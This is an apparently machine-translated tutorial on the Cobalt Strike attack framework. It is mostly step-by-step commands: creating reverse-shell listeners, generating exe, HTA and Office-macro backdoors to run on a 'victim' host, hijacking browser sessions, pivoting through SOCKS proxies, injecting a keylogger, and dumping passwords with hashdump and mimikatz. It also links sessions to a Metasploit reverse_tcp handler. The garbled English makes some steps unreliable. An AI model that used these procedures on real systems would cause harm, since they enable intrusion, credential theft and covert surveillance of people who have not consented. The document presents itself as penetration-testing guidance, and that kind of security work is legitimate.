Introduction to Cobalt Strike

Introduction to Cobalt Strike

Cobalt Strike a metasploit-based GUI of the framework of penetration testing tools, integrated port forwarding, service scanning, automation overflow, multi-mode port monitoring, win exe Trojan generation, win dll Trojan generation, java Trojan generation, office macro virus Generation, Trojans tied; phishing attacks include: site cloning, target information access, java implementation, the browser automatically attack and so on. The Cobalt Strike 3.0 is no longer using the Metasploit framework as a standalone platform, and can be used in conjunction with Armitage.

Cobalt Strike Usage

1. Execute the command on the community server to run the server:

./teamserver 10.0.0.88 backlion // The server IP address is 10.0.0.88 and the password is backlion

2. Execute on customer service (can be connected):

On windows

Java -XX: + AggressiveHeap -XX: + UseParallelGC -jar cobaltstrike.jar $

On Linux:

./cobaltstrike  

Hostname: 10.0.0.88 port: 50050 user name: any password: backlion

3. Create a local monitor listen:

Cobalt Strike-> Listeners, and then click Add to create your own Listeners, Cobalt Strike3.6 include

· windows/beacon_dns/reverse_dns_txt

· windows/beacon_dns/reverse_http

· windows/beacon_http/reverse_http

· windows/beacon_https/reverse_https

· windows/beacon_smb/bind_pipe

· windows/foreign/reverse_dns_txt

· windows/foreign/reverse_http

· windows/foreign/reverse_https

· windows/foreign/reverse_tcp

On windows/beacon * is Cobalt Strike comes with the module, including dns, http, https, smb four kinds of listeners, windows/foreign * for the external listener, that is, msf or Armitage listener. Select the listener after the host will automatically fill in the service when we open the ip, configure the listening port, and then save the listener.

4. Attack module introduction

Create a good listener, the following need to configure the client, Cobalt Strike includes a variety of attacks, including Packages include the following:

HTML Application generates malicious HTA Trojan files;

MS Office Macro generates office macro virus files;

Payload Generator generates payload for various language versions;

USB / CD AutoPlay Generates Trojan files that run with autoplay;

Windows Dropper bundles, able to bundle the document class;

Windows Executable generates executable exe Trojans;

Windows Executable (S) generates a stateless executable exe Trojan.

Web Drive-by includes the following modules:

Manage Manage open web services

Clone Site cloning site that can record the data submitted by the victim;

Host File provides a file download, you can modify the Mime information;

Scripted Web Delivery is similar to web_delivery msf;

Signed Applet Attack uses a java self-signed program for phishing attacks;

Smart Applet Attack automatically detects java version and attack, for Java 1.6.0_45  and Java 1.7.0_21;

System Profiler is used to get some system information, such as system version, Flash version, browser version and so on.

Spear Phish is a module for mailing.

5.View display module introduction

View module can facilitate the test to see the various modules, graphical interface can easily see the victims of the machine’s various information.

Applications show the application information of the victim machine;

Credentials shows the victim machine’s certificate information , can be more convenient for subsequent infiltration ;

Download Download  the file

Event Log can see the event log, clearly see the system events, and the team can chat here;

Keystrokes View keyloggers ;

Proxy Pivots View proxy information ;

Screenshots screenshots function ;

Script Console where you can load a variety of enhancements to the script, the script address is cortana-script ;

Targets to see the target;

Web Log View web log.

6. Reporting the introduction of the report module

Activity report activity report generation

Hosts report host report

Indicators of Compromise target report

Sessions report Session report

Social Engineering Report

7.Beacon module used

7.0 Generate an exe backdoor

Attacks – packages – windows executable, can generate a windows exe back door, as shown below:

7.1 The generated backdoor artifact.exe is uploaded to the victim host to execute

In the Cobalt Strike will rebound in the target victim host shell, and then click on the victim’s machine in the

7.2 Click on the victim to rebound in the host of the interaction, and then you can enter into the beacon

 

7.3 shell command for beacon module **

Beacon> help shell

Beacon> shell ifconfig

Beacon> shell whoami

Beacon> shell net user

7.4 beacon browserpivot command

The user into the victim browser process, and then open the HTTP proxy, then you can log on the victims of the site

Beacon> ps // view the browser process, where the process is 2396

Beacon> browserpivot 2396 / / into the process, and open the http proxy, the proxy server: 10.0.0.88:62243

The local browser sets the http proxy, host: 10.0.0.88 The proxy type is: http port: 62243

Beacon> browserpivot stop // stop the agent

7.5 beacon module Socks command

Select the victim host, and then right Pivoting-> SOCKS Server, then use this computer to open socks proxy

Configure the proxychains configuration file under kali:

vim /etc/proxychains.conf

Change socks4 127.0.0.1 9050 to: socks4 127.0.0.1 26370

Proxychains firefox ESR // can access broiler intranet via sokcsk5 agent

Beacon> socks stop // close the scoks proxy

7.6 beacon module of the Screenshot & Keylogger

Beacon> screenshot // Run the screenshots command

And then open View-> Screenshots, you can see the screenshot

Beacon> ps / / view the system process, casually choose a process PID process

Beacon> keylogger 2640 // keyboard record injection process

Open View-> Keystrokes, you can see the keyboard record results

7.7 beacon module powershell-import command 

Beacon> powershell-import // Import various powershell scripts, where you can import the nishang module

Beacon> powershell posershell_script_name

or

Beacon> powershell Check-VM

7.8 Cobalt Strike and msf linkage

1. Execute the following command under MSF:

msf> use exploit / multi / handler

msf exploit (handler)> set payload windows / meterpreter / reverse_tcp

msf exploit (handler)> set lhost 192.168.1.100

msf exploit (handler)> set lport 4444

msf exploit (handler)> exploit

2. In the implementation of the Cobalt Strike, first add a monitor command, the name is: msf payload Select: windows/foreign/reverse_tcp listening port: 4444

 

3. Select the victim host, then right-click Spawn

4. In msf can be a rebound under the meterpreter session:

7.9 beacon password module

Beacon> sleep 0   // show the results quickly

Beacon> wdigest // read the information

Beacon> hashdump    // read account hash password value, need to know permissions, right click victim host –access-hashdump

Beacon> logonpasswords   // run mimikatz, right click victim host – illustrated RUN mimikatz

Cobalt Strike Summary

Cobalt Strike features exceptionally powerful, and MSF graphical interface, more intuitive operation, more convenient for automated attacks, you have to help in the penetration test